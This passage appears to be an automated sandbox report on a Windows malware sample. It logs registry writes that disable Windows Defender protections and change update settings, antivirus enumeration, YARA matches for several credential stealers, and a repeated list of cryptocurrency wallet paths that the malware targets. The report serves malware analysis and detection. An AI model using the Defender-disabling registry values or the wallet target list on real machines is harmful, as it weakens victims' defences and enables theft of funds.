Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\vMcvSUhjRwUjZHoUBOuO.txt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6235A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

0_2_6C6235A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_00FE65E0 LookupAccountNameA,

23_2_00FE65E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_01022517 GetTimeZoneInformation,

23_2_01022517

Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: file1.exe, 00000018.00000002.2883393880.0000000001351000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823411403.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 23.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3287942560.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2465485176.0000000000721000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
